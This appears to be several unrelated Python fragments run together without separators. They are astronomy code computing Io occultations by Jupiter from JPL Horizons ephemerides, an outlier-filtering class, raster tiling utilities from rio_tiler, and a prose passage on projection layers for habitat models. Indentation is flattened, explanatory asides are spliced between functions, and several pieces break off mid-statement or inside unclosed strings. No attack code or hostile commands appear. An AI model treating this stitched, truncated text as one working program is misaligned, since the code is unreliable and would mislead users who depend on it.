# Obliquity of the starry map is the CCW angle from the celestial
# NP to the NP of the target body
data["obl"] = interpolate_angle(
times.mjd,
times_jpl.mjd,
eph["NPole_ang"].to(u.rad),
).to(u.deg)
# Compute the location of the subsolar point relative to the central
# point of the disc
lon_subsolar = subtract_angles(
np.array(eph["PDSunLon"].to(u.rad)),
np.array(eph["PDObsLon"].to(u.rad)),
)
lon_subsolar = 2 * np.pi - lon_subsolar # positive lon. is to the east
lat_subsolar = subtract_angles(
np.array(eph["PDSunLat"].to(u.rad)),
np.array(eph["PDObsLat"].to(u.rad)),
)
# Location of the subsolar point in cartesian Starry coordinates
xs = np.array(eph["r"]) * np.cos(lat_subsolar) * np.sin(lon_subsolar)
ys = np.array(eph["r"]) * np.sin(lat_subsolar)
zs = np.array(eph["r"]) * np.cos(lat_subsolar) * np.cos(lon_subsolar)
data["xs"] = np.interp(times.mjd, times_jpl.mjd, xs) * u.AU
data["ys"] = np.interp(times.mjd, times_jpl.mjd, ys) * u.AU
data["zs"] = np.interp(times.mjd, times_jpl.mjd, zs) * u.AU
return data
def get_body_vectors(times, body_id="501", step="1m", location="@sun"):
"""
Returns the JPL Horizons position (and velocity) vector of a given Solar
System body for the requested times.
Args:
times (astropy.time): Observation times.
body_id (str, optional): NAIF code for the target body. By default '501'
for Io.
step (str, optional): Step size for querying JPL Horizons. Minimum is "1m".
Make sure this is sufficiently small for accurate ephemeris.
location (str, optional): The origin of the coordinate system. By default
"@sun" for heliocentric position vectors. Other options include "500"
for center of earth and "@ssb" for Solar System Barycenter.
Returns:
astropy.timeseries.TimeSeries
An astropy.TimeSeries object specifying the (x, y, z) coordinates and
(vx, vy, vz) velocity components and distance r of the target body.
"""
start = times.isot[0]
# because Horizons time range doesn't include the endpoint we need to add
# some extra time
if step[-1] == "m":
padding = 2 * float(step[:-1]) / (60 * 24)
elif step[-1] == "h":
padding = 2 * float(step[:-1]) / 24
elif step[-1] == "d":
padding = 2 * float(step[:-1])
else:
raise ValueError(
"Unrecognized JPL Horizons step size. Use '1m' or '1h' for example."
)
end = Time(times.mjd[-1] + padding, format="mjd").isot
# Query JPL Horizons
epochs = {"start": start, "stop": end, "step": step}
obj = Horizons(id=body_id, epochs=epochs, id_type="id", location=location)
vec = obj.vectors()
times_jpl = Time(vec["datetime_jd"], format="jd")
# Store all data in a TimeSeries object
data = TimeSeries(time=times)
data["x"] = np.interp(times.mjd, times_jpl.mjd, vec["x"]) * vec["x"].unit
data["y"] = np.interp(times.mjd, times_jpl.mjd, vec["y"]) * vec["y"].unit
data["z"] = np.interp(times.mjd, times_jpl.mjd, vec["z"]) * vec["z"].unit
data["vx"] = (
np.interp(times.mjd, times_jpl.mjd, vec["vx"]) * vec["vx"].unit
)
data["vy"] = (
np.interp(times.mjd, times_jpl.mjd, vec["vy"]) * vec["vy"].unit
)
data["vz"] = (
np.interp(times.mjd, times_jpl.mjd, vec["vz"]) * vec["vz"].unit
)
data["r"] = (
np.interp(times.mjd, times_jpl.mjd, vec["range"]) * vec["range"].unit
)
return data
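The step-size padding logic at the top of `get_body_vectors` is a small unit conversion; a standalone sketch (the helper name is mine):

```python
# Convert a JPL Horizons step string ('1m', '2h', '1d') into twice that
# interval in days -- the padding appended so the queried time range
# covers the final requested epoch.
def step_padding_days(step):
    value = float(step[:-1])
    if step[-1] == "m":
        return 2 * value / (60 * 24)
    elif step[-1] == "h":
        return 2 * value / 24
    elif step[-1] == "d":
        return 2 * value
    raise ValueError(
        "Unrecognized JPL Horizons step size. Use '1m' or '1h' for example."
    )
```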
def get_effective_jupiter_radius(latitude, method="howell"):
"""
Return the radius of Jupiter (in km) at the 2.2 mbar level,
given the planetocentric latitude of Jupiter in degrees.
"""
if method == "howell":
# Conversion factors
dpr = 360.0 / (2.0 * np.pi)
# Compute powers of sin(lat)
u0 = 1.0
u1 = np.sin(latitude / dpr)
u2 = u1 * u1
u3 = u1 * u2
u4 = u1 * u3
u5 = u1 * u4
u6 = u1 * u5
# Legendre polynomials
p0 = 1
p1 = u1
p2 = (-1.0 + 3.0 * u2) / 2.0
p3 = (-3.0 * u1 + 5.0 * u3) / 2.0
p4 = (3.0 - 30.0 * u2 + 35.0 * u4) / 8.0
p5 = (15.0 * u1 - 70.0 * u3 + 63.0 * u5) / 8.0
p6 = (-5.0 + 105.0 * u2 - 315.0 * u4 + 231.0 * u6) / 16.0
# Find the radius at 100 mbar
jr = (
71541.0
- 1631.3 * p0
+ 16.8 * p1
- 3136.2 * p2
- 6.9 * p3
+ 133.0 * p4
- 18.9 * p5
- 8.5 * p6
)
jr += 85.0 # Find the radius at 2.2 mbar
# According to <NAME>, this is the
# half light point for occultations.
jr += -27 # subtract one scale height due to bending of light
return jr
else:
# Radius in km, by eye estimate
reff_100 = np.array(
[66896, 67350, 71400, 71541, 70950, 70400, 67950, 66896]
)
lat_100 = np.array([-90, -70.0, -10.0, 0.0, 20.0, 27.0, 60.0, 90])
# Cubic interpolate
f = interp1d(lat_100, reff_100, kind="cubic", fill_value="extrapolate")
jr = float(f(latitude))
# Correction factor for going from 100->2.2mbar
jr += -np.log(2.2 / 100) * 27 - 27 # scale height 27km
return jr
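As an independent sanity check (mine, not part of the source), the hand-expanded `p0`..`p6` in the `howell` branch are the Legendre polynomials evaluated at `u1 = sin(latitude)`, which `numpy.polynomial.legendre` reproduces:

```python
import numpy as np

u1 = np.sin(np.deg2rad(23.0))

# Hand-expanded P4, as in the 'howell' branch above.
p4_manual = (3.0 - 30.0 * u1 ** 2 + 35.0 * u1 ** 4) / 8.0

# legval(x, c) evaluates sum_i c[i] * P_i(x); the coefficient vector
# [0, 0, 0, 0, 1] therefore selects P_4.
p4_numpy = np.polynomial.legendre.legval(u1, [0, 0, 0, 0, 1])

assert np.isclose(p4_manual, p4_numpy)
```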
def get_occultation_latitude(x_io, y_io, re):
"""
Compute the approximate latitude of Jupiter at which an occultation occurs.
In this case we assume that Jupiter is a sphere with radius equal
to the equatorial radius. This assumption is good enough for computing
the latitude because occultations occur at roughly +-20 degrees N.
"""
y = x_io
z = y_io
x = np.sqrt(re ** 2 - z ** 2 - y ** 2)
theta = np.arctan2(np.sqrt(x ** 2 + y ** 2), z)
return 90 - theta * 180 / np.pi
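A self-contained sketch of the geometry above (constants approximate, function name restated for the example): a point in the equatorial plane (`y_io = 0`) maps to latitude 0, and moving toward the pole raises the latitude.

```python
import numpy as np

# Spherical-Jupiter approximation: (x_io, y_io) is the occultation point in
# the sky plane, re the assumed spherical radius in km.
def occ_latitude(x_io, y_io, re):
    y, z = x_io, y_io
    x = np.sqrt(re ** 2 - z ** 2 - y ** 2)       # line-of-sight component
    theta = np.arctan2(np.sqrt(x ** 2 + y ** 2), z)  # colatitude
    return 90 - np.degrees(theta)

re = 71600.0  # approximate equatorial radius of Jupiter [km]
print(occ_latitude(10000.0, 0.0, re))  # ~0: the occultation grazes the equator
```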
def get_occultor_position_and_radius(
eph_occulted,
eph_occultor,
occultor_is_jupiter=False,
rotate=True,
return_occ_lat=False,
**kwargs
):
"""
Given the ephemeris of an occulted object and an occultor, the function
returns the relative position of the occultor in Starry format. If the
occultor is Jupiter the radius isn't trivial to compute because Jupiter is
an oblate spheroid. In that case we instead compute the effective radius at
a given planetocentric latitude at which the occultation is happening.
This is implemented in :func:`get_effective_jupiter_radius`.
Args:
eph_occulted (astropy.timeseries.TimeSeries): ephemeris of the occulted
body.
eph_occultor (astropy.timeseries.TimeSeries): ephemeris of the occultor.
occultor_is_jupiter (bool): Set to true if occultor is Jupiter because
Jupiter is non-spherical and its radius needs to be estimated in a
different way. Defaults to False.
rotate (bool): Rotate the position vectors to a frame in which the
obliquity of the occultor is zero. Defaults to True.
return_occ_lat (bool): Optionally return the occultation latitude if
the occultor is Jupiter. Defaults to False.
Returns:
list: (xo, yo, ro)
"""
delta_ra = (eph_occultor["RA"] - eph_occulted["RA"]).to(u.arcsec)
delta_dec = (eph_occultor["DEC"] - eph_occulted["DEC"]).to(u.arcsec)
xo = (
-delta_ra
* np.cos(eph_occulted["DEC"].to(u.rad))
/ (0.5 * eph_occulted["ang_width"].to(u.arcsec))
).value
yo = (delta_dec / (0.5 * eph_occulted["ang_width"].to(u.arcsec))).value
if occultor_is_jupiter is False:
# Convert everything to units where the radius of Io = 1
rad_occ = eph_occultor["ang_width"].to(u.arcsec) / eph_occulted[
"ang_width"
].to(u.arcsec)
ro = np.mean(rad_occ).value
# Jupiter is non-spherical so we need to compute an effective radius
else:
re = 71541 + 59 # equatorial radius of Jupiter (approx) [km]
r_io = 1821.3 * u.km # radius of Io (km)
jup_dist = eph_occultor["dist"].to(u.km)
xo = (
((-delta_ra * np.cos(eph_occultor["DEC"].to(u.rad)))).to(u.rad)
* jup_dist
/ r_io
)
yo = delta_dec.to(u.rad) * jup_dist / r_io
obl = eph_occulted["obl"]
inc = np.mean(eph_occultor["inc"])
xo_unrot = xo.value
yo_unrot = yo.value
# Rotate to coordinate system where the obliquity of Io is 0
theta_rot = -obl.to(u.rad).value
xo_rot, yo_rot = rotate_vectors(
np.array(xo_unrot), np.array(yo_unrot), np.array(theta_rot)
)
# Choose point inside Jupiter
idx = np.argmin(np.abs(xo_rot))
# Position of Io relative to Jupiter in km
x_io = -xo_rot[idx] * r_io.value
y_io = -yo_rot[idx] * r_io.value
lat = get_occultation_latitude(x_io, y_io, re)
reff = get_effective_jupiter_radius(lat, **kwargs)
ro = reff / r_io.value
# Rotate position vectors such that the obliquity of the occultor is 0
if rotate:
theta_rot = -eph_occulted["obl"].to(u.rad).value
xo, yo = rotate_vectors(
np.array(xo), np.array(yo), np.array(theta_rot)
)
if return_occ_lat:
if not occultor_is_jupiter:
raise ValueError(
"Occultation | |
# -*- coding: utf-8 -*-
"""
"""
import numpy as np
from scipy import interpolate
"""
*****************************************************************************************************************************
The Filter class provides methods for data filtering and smoothing.
constants:: used in methods as fixed values
Flags used in methods to indicate whether a method succeeded or failed.
error : 'error'
success : 'success'
Error messages used in different methods.
eMsg1 : 'Internal Error'
eMsg2 : 'For fixed moving average provide odd numbers of window '
eMsg3 : 'Window is bigger than the input length.'
eMsg4 : 'Number of input values less than 3'
eMsg5 : 'Provide a proper moving average type'
eMsg6 : 'Provide an integer value'
eMsg7 : 'There is no outlier values to interpolate'
eMsg8 : 'Outlier percentage is 100 %. Put proper Max and min values'
eMsg9 : 'Provide a valid interpolation type'
arrayLenLimit : lower limit for number of data in input array i.e 3
stdDevFactorMax : standard deviation factor upper limit i.e 6
stdDevFactorMin : standard deviation factor lower limit i.e 1
methods::
maxMin(inDataArray, inMaxLim, inMinLim) : Finds outlier indexes in the input data based on the max and min limits provided by the user.
stdDev(inDataArray, inStdDevFact) : Measures the amount of variation or dispersion in the input data, depending on the standard deviation factor.
movingAvg(inDataArray, inWindow, inMavgType) : Calculates a forward, backward, or fixed (centered) moving average over the data using the given window size.
countConsec(indexVal, inOutlierArray) : Calculates the first run of consecutive values in a given array, starting from a given index.
count(inOutlierArray): Calculates the number of consecutive data sets.
interpolation(inDataArray, inOutlierArray, inIntpTyp, inMaxLim, inMinLim): Constructs new data points within the range of a discrete set of known data points.
*****************************************************************************************************************************"""
class Filter():
    # constructor; the class currently keeps no per-instance state
    def __init__(self):
        pass
error = 'error'
success = 'success'
eMsg1 = 'Internal Error'
    eMsg2 = 'For fixed moving average provide an odd number of windows'
    eMsg3 = 'Window is bigger than the input length.'
    eMsg4 = 'Number of input values less than 3'
    eMsg5 = 'Provide a proper moving average type'
    eMsg6 = 'Provide an integer value'
    eMsg7 = 'There are no outlier values to interpolate'
    eMsg8 = 'Outlier percentage is 100%. Provide proper max and min values'
eMsg9 = 'Provide a valid interpolation type'
cArrayLenLimit = 3
cStdDevFactMax = 6
cStdDevFactMin = 1
"""
******************************************************************************************************************************************
method maxMin : Finds outlier indexes based on the max and min limits provided by the user.
    inDataArray : input array in which to find outliers
    inMaxLim : max limit provided by the user
    inMinLim : min limit provided by the user
variables:
    arrayMaxval : max value in the input array
    arrayMinval : min value in the input array
return:
    flag : success or error
    outOPercent : percentage of the data identified as outliers relative to the total data, in [%]
    outOutlierArray : array of indexes of the rows identified as outliers
    msg : success or error message with the reason
*******************************************************************************************************************************************"""
def maxMin(self, inDataArray, inMaxLim, inMinLim):
#initializing
outOutlierArray = []
outOPercent = 0
flag = Filter.success
msg = ''
# providing try block to handle exceptions
try:
# checking valid length of array
if (len(inDataArray) < Filter.cArrayLenLimit):
msg = Filter.eMsg4 # 'Number of input values less than 3'
flag = Filter.error
return flag, outOPercent, outOutlierArray, msg
# checking if max value provided is less than min value
if (inMaxLim < inMinLim):
flag = Filter.error
msg = 'Max value is lower than Min value'
# checking if max value provided is equal to min value
elif (inMaxLim == inMinLim):
flag = Filter.error
                msg = 'Max value is equal to Min value'
else:
arrayMaxVal = max(inDataArray) #getting max input data
arrayMinVal = min(inDataArray) #getting min input data
#checking if there is any outlier values
if(inMaxLim >= arrayMaxVal and inMinLim <= arrayMinVal):
flag = Filter.error
                    msg = Filter.eMsg7 # message: no outlier values to interpolate
return flag, outOPercent, outOutlierArray, msg
                #finding outlier indexes of the original array
for index in range(len(inDataArray)):
if inDataArray[index] > inMaxLim or inDataArray[index] < inMinLim:
outOutlierArray.append(index)
outOPercent = len(outOutlierArray) * 100 / len(inDataArray) #percentage of outlier
#checking if 100 percent of data is outliers
if (outOPercent == 100):
flag = Filter.error
msg = Filter.eMsg8
# handling exceptions in except block
        except Exception:
            flag = Filter.error
            msg = Filter.eMsg1 # unexpected error
        return flag, outOPercent, outOutlierArray, msg # returning flag (success or error), outlier percentage, outlier indexes, message
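The max/min scan above reduces to a simple index filter. A minimal standalone sketch of the same idea, independent of the Filter class (the function name and sample values are hypothetical):

```python
def max_min_outliers(data, max_lim, min_lim):
    """Return indexes of values outside [min_lim, max_lim] and the outlier percentage."""
    outliers = [i for i, v in enumerate(data) if v > max_lim or v < min_lim]
    percent = len(outliers) * 100 / len(data)
    return outliers, percent

idx, pct = max_min_outliers([1, 5, 50, 7, -10], max_lim=10, min_lim=0)
print(idx, pct)  # [2, 4] 40.0
```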
"""
*****************************************************************************************************************************
method stdDev : Provides a measure of the amount of variation or dispersion in the input data using the standard deviation factor.
    inDataArray : input array in which to find outliers
    inStdDevFact : factor that multiplies the standard deviation; used to calculate the max and min limit values.
                   Currently the standard deviation factor is restricted to values 1 to 6.
variables:
    stdDev : the standard deviation of the data
    stdMean : the mean of the data
return:
    flag : success or error
    outOPercent : percentage of the data identified as outliers relative to the total data, in [%]
    outOutlierArray : array of indexes of the rows identified as outliers
    outMaxLim : the calculated maximum value limit
    outMinLim : the calculated minimum value limit
    msg : success or error message with the reason
*****************************************************************************************************************************"""
def stdDev(self, inDataArray, inStdDevFact):
outOutlierArray = [] # initializing array
flag = Filter.success
msg = ''
# providing try block to handle exceptions
try:
# initializing variables
outOPercent = 0
outMaxLim = 0
outMinLim = 0
#catch error that the StdDevFact should be an integer value
if type(inStdDevFact) != int:
                msg = Filter.eMsg6 # 'Provide an integer value'
flag = Filter.error
return flag, outOPercent, outOutlierArray, outMaxLim, outMinLim, msg
# check the range of standard deviation factor
if inStdDevFact > Filter.cStdDevFactMax or inStdDevFact < Filter.cStdDevFactMin:
msg = 'standard deviation factor should be between ' + str(Filter.cStdDevFactMin) + ' and ' + str(
Filter.cStdDevFactMax)
flag = Filter.error
                return flag, outOPercent, outOutlierArray, outMaxLim, outMinLim, msg # returning flag (error), 0, [], 0, 0, message
# checking valid length of array
if len(inDataArray) < Filter.cArrayLenLimit:
msg = Filter.eMsg4 # 'Number of input values less than 3'
flag = Filter.error
                return flag, outOPercent, outOutlierArray, outMaxLim, outMinLim, msg # returning flag (error), 0, [], 0, 0, message
# calculation with valid length of array
else:
stdDev = np.std(inDataArray, axis=0) #calculated standard deviation
                stdMean = np.mean(inDataArray, axis=0) #calculated mean
outMaxLim = stdMean + (stdDev * inStdDevFact) # calculated max limit
outMinLim = stdMean - (stdDev * inStdDevFact) #calculated min limit
# calls the maxMin to detect the outliers based on calculated MaxLim and MinLim
flag, outOPercent, outOutlierArray, msg = Filter.maxMin(self, inDataArray, outMaxLim, outMinLim)
# handling exceptions in except block
        except Exception:
            flag = Filter.error
            msg = Filter.eMsg1 # unexpected error
        return flag, outOPercent, outOutlierArray, outMaxLim, outMinLim, msg # returning flag (success or error), outlier percentage, outlier indexes, max limit, min limit, message
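The limit calculation in stdDev is just mean ± factor · standard deviation. A small sketch, using hypothetical sample data, shows the arithmetic:

```python
import numpy as np

def std_dev_limits(data, factor):
    """Outlier limits as mean +/- factor * standard deviation."""
    mean = np.mean(data)
    std = np.std(data)  # np.std defaults to the population standard deviation
    return mean + std * factor, mean - std * factor

# mean = 5.0, std = 2.0, so with factor 2 the limits are 9.0 and 1.0
hi, lo = std_dev_limits([2.0, 4.0, 4.0, 4.0, 5.0, 5.0, 7.0, 9.0], 2)
print(hi, lo)  # 9.0 1.0
```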
"""
*****************************************************************************************************************************
method movingAvg : Calculates the moving average of the data using a forward, backward, or fixed window
                   of the size determined by the user.
parameters:
    inDataArray : input array to smooth
    inWindow : window size used to calculate the moving average
    inMavgType : type of moving average; default inMavgType = backward.
                 The value can be any of these three, according to the user:
                 1. forward
                 2. backward
                 3. fixed
variables:
    values : array capturing intermediate values after convolution
    weights : array calculated with the numpy repeat method, of size inWindow with value 1.0/inWindow
    revArray : intermediate array used to calculate the final array
    inputArrayLen : number of input values
"""rio_tiler.utils: utility functions."""
import os
from io import BytesIO
from typing import Any, Dict, Generator, Optional, Sequence, Tuple, Union
import numpy
from affine import Affine
from boto3.session import Session as boto3_session
from rasterio import windows
from rasterio.crs import CRS
from rasterio.enums import ColorInterp, MaskFlags
from rasterio.features import is_valid_geom
from rasterio.io import DatasetReader, DatasetWriter, MemoryFile
from rasterio.rio.helpers import coords
from rasterio.transform import from_bounds, rowcol
from rasterio.vrt import WarpedVRT
from rasterio.warp import calculate_default_transform, transform_geom
from .colormap import apply_cmap
from .constants import WEB_MERCATOR_CRS, BBox, NumType
from .errors import RioTilerError
def _chunks(my_list: Sequence, chunk_size: int) -> Generator[Sequence, None, None]:
    """Yield successive chunk_size-sized chunks from my_list."""
    for i in range(0, len(my_list), chunk_size):
        yield my_list[i : i + chunk_size]
def aws_get_object(
bucket: str,
key: str,
request_pays: bool = False,
client: boto3_session.client = None,
) -> bytes:
"""AWS s3 get object content."""
if not client:
session = boto3_session()
endpoint_url = os.environ.get("AWS_S3_ENDPOINT", None)
client = session.client("s3", endpoint_url=endpoint_url)
params = {"Bucket": bucket, "Key": key}
if request_pays:
params["RequestPayer"] = "requester"
response = client.get_object(**params)
return response["Body"].read()
def _stats(
arr: numpy.ma.array, percentiles: Tuple[float, float] = (2, 98), **kwargs: Any
) -> Dict:
"""Calculate array statistics.
Args:
arr (numpy.ndarray): Input array data to get the stats from.
percentiles (tuple, optional): Min/Max percentiles to compute. Defaults to `(2, 98)`.
kwargs (optional): Options to forward to numpy.histogram function.
Returns:
dict: numpy array statistics (percentiles, min, max, stdev, histogram, valid_percent).
Examples:
>>> {
'percentiles': [38, 147],
'min': 20,
'max': 180,
'std': 28.123562304138662,
'histogram': [
[1625, 219241, 28344, 15808, 12325, 10687, 8535, 7348, 4656, 1208],
[20.0, 36.0, 52.0, 68.0, 84.0, 100.0, 116.0, 132.0, 148.0, 164.0, 180.0]
],
'valid_percent': 0.5
}
"""
sample, edges = numpy.histogram(arr[~arr.mask], **kwargs)
return dict(
percentiles=numpy.percentile(arr[~arr.mask], percentiles)
.astype(arr.dtype)
.tolist(),
min=arr.min().item(),
max=arr.max().item(),
std=arr.std().item(),
histogram=[sample.tolist(), edges.tolist()],
valid_percent=numpy.count_nonzero(~arr.mask) / float(arr.data.size),
)
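`_stats` operates on a masked array, so nodata pixels are excluded from every statistic. A minimal illustration of that masking behaviour (values are hypothetical):

```python
import numpy

arr = numpy.ma.masked_array(
    numpy.array([10, 20, 30, 40, 255]),
    mask=[False, False, False, False, True],  # treat 255 as nodata
)
valid = arr[~arr.mask]  # the statistics only see the unmasked values
print(int(valid.min()), int(valid.max()))                     # 10 40
print(numpy.count_nonzero(~arr.mask) / float(arr.data.size))  # 0.8
```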
# https://github.com/OSGeo/gdal/blob/b1c9c12ad373e40b955162b45d704070d4ebf7b0/gdal/frmts/ingr/IngrTypes.cpp#L191
def _div_round_up(a: int, b: int) -> int:
return (a // b) if (a % b) == 0 else (a // b) + 1
def get_overview_level(
src_dst: Union[DatasetReader, DatasetWriter, WarpedVRT],
bounds: BBox,
height: int,
width: int,
dst_crs: CRS = WEB_MERCATOR_CRS,
) -> int:
"""Return the overview level corresponding to the tile resolution.
Freely adapted from https://github.com/OSGeo/gdal/blob/41993f127e6e1669fbd9e944744b7c9b2bd6c400/gdal/apps/gdalwarp_lib.cpp#L2293-L2362
Args:
src_dst (rasterio.io.DatasetReader or rasterio.io.DatasetWriter or rasterio.vrt.WarpedVRT): Rasterio dataset.
bounds (tuple): Bounding box coordinates in target crs (**dst_crs**).
height (int): Desired output height of the array for the input bounds.
width (int): Desired output width of the array for the input bounds.
dst_crs (rasterio.crs.CRS, optional): Target Coordinate Reference System. Defaults to `epsg:3857`.
Returns:
int: Overview level.
"""
dst_transform, _, _ = calculate_default_transform(
src_dst.crs, dst_crs, src_dst.width, src_dst.height, *src_dst.bounds
)
src_res = dst_transform.a
# Compute what the "natural" output resolution
# (in pixels) would be for this input dataset
vrt_transform = from_bounds(*bounds, width, height)
target_res = vrt_transform.a
ovr_idx = -1
if target_res > src_res:
res = [src_res * decim for decim in src_dst.overviews(1)]
for ovr_idx in range(ovr_idx, len(res) - 1):
ovrRes = src_res if ovr_idx < 0 else res[ovr_idx]
nextRes = res[ovr_idx + 1]
if (ovrRes < target_res) and (nextRes > target_res):
break
if abs(ovrRes - target_res) < 1e-1:
break
else:
ovr_idx = len(res) - 1
return ovr_idx
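The search above walks the overview resolutions from finest to coarsest and stops at the last overview that is still finer than the target resolution. A simplified standalone sketch of that selection, dropping the near-equality early exit (resolutions and decimation factors are hypothetical):

```python
def pick_overview(src_res, decimations, target_res):
    # mirrors get_overview_level's search over overview resolutions
    ovr_idx = -1
    if target_res > src_res:
        res = [src_res * d for d in decimations]
        for ovr_idx in range(ovr_idx, len(res) - 1):
            ovr_res = src_res if ovr_idx < 0 else res[ovr_idx]
            if ovr_res < target_res < res[ovr_idx + 1]:
                break
        else:
            # target is coarser than every overview: use the coarsest one
            ovr_idx = len(res) - 1
    return ovr_idx

print(pick_overview(1.0, [2, 4, 8], 5.0))  # 1 -> use the 4x overview
print(pick_overview(1.0, [2, 4, 8], 0.5))  # -1 -> use full resolution
```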
def get_vrt_transform(
src_dst: Union[DatasetReader, DatasetWriter, WarpedVRT],
bounds: BBox,
height: Optional[int] = None,
width: Optional[int] = None,
dst_crs: CRS = WEB_MERCATOR_CRS,
window_precision: int = 6,
) -> Tuple[Affine, int, int]:
"""Calculate VRT transform.
Args:
src_dst (rasterio.io.DatasetReader or rasterio.io.DatasetWriter or rasterio.vrt.WarpedVRT): Rasterio dataset.
bounds (tuple): Bounding box coordinates in target crs (**dst_crs**).
height (int, optional): Desired output height of the array for the input bounds.
width (int, optional): Desired output width of the array for the input bounds.
dst_crs (rasterio.crs.CRS, optional): Target Coordinate Reference System. Defaults to `epsg:3857`.
Returns:
tuple: VRT transform (affine.Affine), width (int) and height (int)
"""
dst_transform, _, _ = calculate_default_transform(
src_dst.crs, dst_crs, src_dst.width, src_dst.height, *src_dst.bounds
)
# If bounds window is aligned with the dataset internal tile we align the bounds with the pixels.
# This is to limit the number of internal block fetched.
if _requested_tile_aligned_with_internal_tile(
src_dst, bounds, height, width, dst_crs
):
col_off, row_off, w, h = windows.from_bounds(
*bounds, transform=src_dst.transform, width=width, height=height,
).flatten()
w = windows.Window(
round(col_off, window_precision),
round(row_off, window_precision),
round(w, window_precision),
round(h, window_precision),
)
bounds = src_dst.window_bounds(w)
w, s, e, n = bounds
    # No output size requested: derive it from the bounds and the dataset's default resolution.
if not height or not width:
vrt_width = max(1, round((e - w) / dst_transform.a))
vrt_height = max(1, round((s - n) / dst_transform.e))
vrt_transform = from_bounds(w, s, e, n, vrt_width, vrt_height)
return vrt_transform, vrt_width, vrt_height
    # Use the finer of the requested tile resolution and the dataset's default resolution, per axis.
tile_transform = from_bounds(w, s, e, n, width, height)
w_res = (
tile_transform.a
if abs(tile_transform.a) < abs(dst_transform.a)
else dst_transform.a
)
h_res = (
tile_transform.e
if abs(tile_transform.e) < abs(dst_transform.e)
else dst_transform.e
)
    # Derive the final VRT size from the chosen per-axis resolutions.
vrt_width = max(1, round((e - w) / w_res))
vrt_height = max(1, round((s - n) / h_res))
vrt_transform = from_bounds(w, s, e, n, vrt_width, vrt_height)
return vrt_transform, vrt_width, vrt_height
def has_alpha_band(src_dst: Union[DatasetReader, DatasetWriter, WarpedVRT]) -> bool:
"""Check for alpha band or mask in source."""
if (
any([MaskFlags.alpha in flags for flags in src_dst.mask_flag_enums])
or ColorInterp.alpha in src_dst.colorinterp
):
return True
return False
def has_mask_band(src_dst: Union[DatasetReader, DatasetWriter, WarpedVRT]) -> bool:
"""Check for mask band in source."""
if any(
[
(MaskFlags.per_dataset in flags and MaskFlags.alpha not in flags)
for flags in src_dst.mask_flag_enums
]
):
return True
return False
def non_alpha_indexes(src_dst: Union[DatasetReader, DatasetWriter, WarpedVRT]) -> Tuple:
"""Return indexes of non-alpha bands."""
return tuple(
b
for ix, b in enumerate(src_dst.indexes)
if (
src_dst.mask_flag_enums[ix] is not MaskFlags.alpha
and src_dst.colorinterp[ix] is not ColorInterp.alpha
)
)
def linear_rescale(
image: numpy.ndarray,
in_range: Tuple[NumType, NumType],
out_range: Tuple[NumType, NumType] = (0, 255),
) -> numpy.ndarray:
"""Apply linear rescaling to a numpy array.
Args:
image (numpy.ndarray): array to rescale.
in_range (tuple): array min/max value to rescale from.
out_range (tuple, optional): output min/max bounds to rescale to. Defaults to `(0, 255)`.
Returns:
numpy.ndarray: linear rescaled array.
"""
imin, imax = in_range
omin, omax = out_range
image = numpy.clip(image, imin, imax) - imin
image = image / numpy.float64(imax - imin)
return image * (omax - omin) + omin
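The rescaling is plain linear interpolation with clipping. A standalone sketch with the same arithmetic (sample values are hypothetical):

```python
import numpy

def rescale(image, in_range, out_range=(0, 255)):
    # same arithmetic as linear_rescale above
    imin, imax = in_range
    omin, omax = out_range
    image = numpy.clip(image, imin, imax) - imin
    image = image / numpy.float64(imax - imin)
    return image * (omax - omin) + omin

out = rescale(numpy.array([0.0, 5.0, 10.0, 20.0]), (0, 10))
print(out.tolist())  # [0.0, 127.5, 255.0, 255.0] -- 20.0 is clipped to the input max
```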
def _requested_tile_aligned_with_internal_tile(
src_dst: Union[DatasetReader, DatasetWriter, WarpedVRT],
bounds: BBox,
height: Optional[int] = None,
width: Optional[int] = None,
bounds_crs: CRS = WEB_MERCATOR_CRS,
) -> bool:
"""Check if tile is aligned with internal tiles."""
if not src_dst.is_tiled:
return False
if src_dst.crs != bounds_crs:
return False
col_off, row_off, w, h = windows.from_bounds(
*bounds, transform=src_dst.transform, height=height, width=width
).flatten()
if round(w) % 64 and round(h) % 64:
return False
if (src_dst.width - round(col_off)) % 64:
return False
if (src_dst.height - round(row_off)) % 64:
return False
return True
def render(
data: numpy.ndarray,
mask: Optional[numpy.ndarray] = None,
img_format: str = "PNG",
colormap: Optional[Dict] = None,
**creation_options: Any,
) -> bytes:
"""Translate numpy.ndarray to image bytes.
Args:
data (numpy.ndarray): Image array to encode.
mask (numpy.ndarray, optional): Mask array.
img_format (str, optional): Image format. See: for the list of supported format by GDAL: https://www.gdal.org/formats_list.html. Defaults to `PNG`.
colormap (dict, optional): GDAL RGBA Color Table dictionary.
creation_options (optional): Image driver creation options to forward to GDAL.
    Returns:
bytes: image body.
Examples:
>>> with COGReader("my_tif.tif") as cog:
img = cog.preview()
with open('test.jpg', 'wb') as f:
f.write(render(img.data, img.mask, img_format="jpeg"))
"""
img_format = img_format.upper()
if len(data.shape) < 3:
data = numpy.expand_dims(data, axis=0)
if colormap:
data, alpha = apply_cmap(data, colormap)
if mask is not None:
mask = (
mask * alpha * 255
) # This is a special case when we want to mask some valid data
# WEBP doesn't support 1band dataset so we must hack to create a RGB dataset
if img_format == "WEBP" and data.shape[0] == 1:
data = numpy.repeat(data, 3, axis=0)
elif img_format == "JPEG":
mask = None
elif img_format == "NPY":
# If mask is not None we add it as the last band
if mask is not None:
mask = numpy.expand_dims(mask, axis=0)
data = numpy.concatenate((data, mask))
bio = BytesIO()
numpy.save(bio, data)
bio.seek(0)
return bio.getvalue()
elif img_format == "NPZ":
bio = BytesIO()
if mask is not None:
numpy.savez_compressed(bio, data=data, mask=mask)
else:
numpy.savez_compressed(bio, data=data)
bio.seek(0)
return bio.getvalue()
count, height, width = data.shape
output_profile = dict(
driver=img_format,
dtype=data.dtype,
count=count + 1 if mask is not None else count,
height=height,
width=width,
)
output_profile.update(creation_options)
with MemoryFile() as memfile:
with memfile.open(**output_profile) as dst:
dst.write(data, indexes=list(range(1, count + 1)))
# Use Mask | |
"projection target") most often contains the same environmental
predictors but represents data captured at a different temporal or spatial location. For
example, a user could generate a model predicting habitat suitability using recorded
presence points and certain environmental predictors such as elevation, landcover, and
proximity to water in one geographic location. Based on the training from this information,
the modeled results could be generated for (or "projected to") a new location based on the
range of values seen in elevation, landcover, and proximity to water in the second geographic
area. Similarly, modeling predicted results through time is also possible. A model trained
using field data and a set of predictor layers representative of one time period could be
projected onto the same geographical area using a new set of predictor layers corresponding
to the same predictors but representing data from a different time period (e.g., different
climate data).
The output of this module is subsequently used as the projection target in the ApplyModel module.
(As part of the process of preparing the layers for modeling, the ProjectionLayers module runs
